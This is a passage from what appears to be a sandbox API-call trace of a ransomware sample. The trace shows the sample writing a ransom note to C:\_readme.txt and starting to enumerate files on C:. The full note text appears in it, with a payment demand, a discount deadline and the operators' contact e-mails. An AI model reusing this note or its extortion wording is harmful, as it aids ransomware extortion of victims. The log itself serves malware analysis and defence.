dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.476] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.478] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.478] PathFindFileNameW (pszPath="") returned="" [0165.478] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.478] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.478] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c098 [0165.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.478] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0165.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x806) returned 0x3b40090 [0165.478] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0165.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.479] PathFileExistsW (pszPath="C:\\_readme.txt") returned 0 [0165.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b408a0 [0165.479] lstrcpyW (in: lpString1=0x3b408a0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.479] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19ec8 [0165.480] CreateFileW (lpFileName="C:\\_readme.txt" (normalized: "c:\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0165.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8c0) returned 0x3b485a8 [0165.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x858) returned 0x3b48e70 [0165.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48e70, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0165.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b496d0 [0165.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48e70 | out: hHeap=0xcd0000) returned 1 [0165.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b485a8 | out: hHeap=0xcd0000) returned 1 [0165.481] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0165.481] WriteFile (in: hFile=0x660, lpBuffer=0x3b496d0*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0x401fb64, lpOverlapped=0x0 | out: lpBuffer=0x3b496d0*, lpNumberOfBytesWritten=0x401fb64*=0x458, lpOverlapped=0x0) returned 1 [0165.481] CloseHandle (hObject=0x660) returned 1 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b496d0 | out: hHeap=0xcd0000) returned 1 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b408a0 | out: hHeap=0xcd0000) returned 1 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.483] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x362b660 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c098 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a70 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c098 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0165.483] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x38) returned 0x362b8e0 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608aa8 | out: hHeap=0xcd0000) returned 1 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0165.483] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c098 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.483] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.483] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0165.483] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0165.483] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x54) returned 0x3613610 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c188 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362b8e0 | out: hHeap=0xcd0000) returned 1 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c098 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.484] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xd11f78 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xd3b9b0 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608aa8 | out: hHeap=0xcd0000) returned 1 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c188 | out: hHeap=0xcd0000) returned 1 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b410b0 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3b9b0 | out: hHeap=0xcd0000) returned 1 [0165.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd11f78 | out: hHeap=0xcd0000) returned 1 [0165.484] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0165.484] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c098 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c188 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa8) returned 0x35e3280 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1b0 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c1d8 [0165.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xd11f78 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b410b0 | out: hHeap=0xcd0000) returned 1 [0165.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0165.485] RtlAllocateHeap 